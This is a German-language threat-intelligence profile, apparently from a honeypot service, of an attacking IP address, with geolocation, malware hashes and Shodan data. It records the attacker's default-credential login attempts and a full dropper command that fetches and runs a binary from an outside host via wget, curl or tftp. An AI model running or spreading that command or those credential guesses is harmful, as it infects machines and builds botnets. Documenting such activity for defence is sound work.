Aktive Bedrohung • MITTEL

85.239.151.41

Herkunftsland🇧🇬 BG

Erste Erkennung26.3.2026

Letzte Aktivitat27.3.2026

ISPInterserver, Inc

🎯

Gesamtangriffe

🔌

Ports

📡

Angriffsarten

🦠

Malware

Geolokalisierung

Land: 🇧🇬 BG
Stadt: Unbekannt
ASN: AS19318
ISP: Interserver, Inc

Angriffsarten

ssh_telnet_honeypot

Angegriffene Ports

Zugehorige Malware

199d11d0fd7043fe9206...→853f57f10f84ee3693b6...→87e18f77a0c4a10abfec...→

Versuchte Anmeldedaten

🔐admin/admin

🔐admin/password

🔐ubnt/ubnt

Ausgefuhrte Befehle

$shell6x

$system6x

$linuxshell6x

$enable3x

$sh3x

$cd /tmp/; echo "senpai" > rootsenpai; cat rootsenpai; rm -rf rootsenpai3x

rm -rf shr; wget http://202.155.10.112/shr || curl -O http://202.155.10.112/shr || tftp 202.155.10.112 -c get shr || tftp -g -r shr 202.155.10.112; chmod 777 shr;./shr ssh; rm -rf shr

Shodan InternetDB ExpositionShodan

InternetDB-Daten, nicht in Echtzeit

Ports

Hostnames

elegantnorth.ptr.network

CPEs

cpe:/o:debian:debian_linuxcpe:/o:linux:linux_kernelcpe:/a:openbsd:openssh:7.9p1

Risikobewertung

/100

NiedrigMittelHochKritisch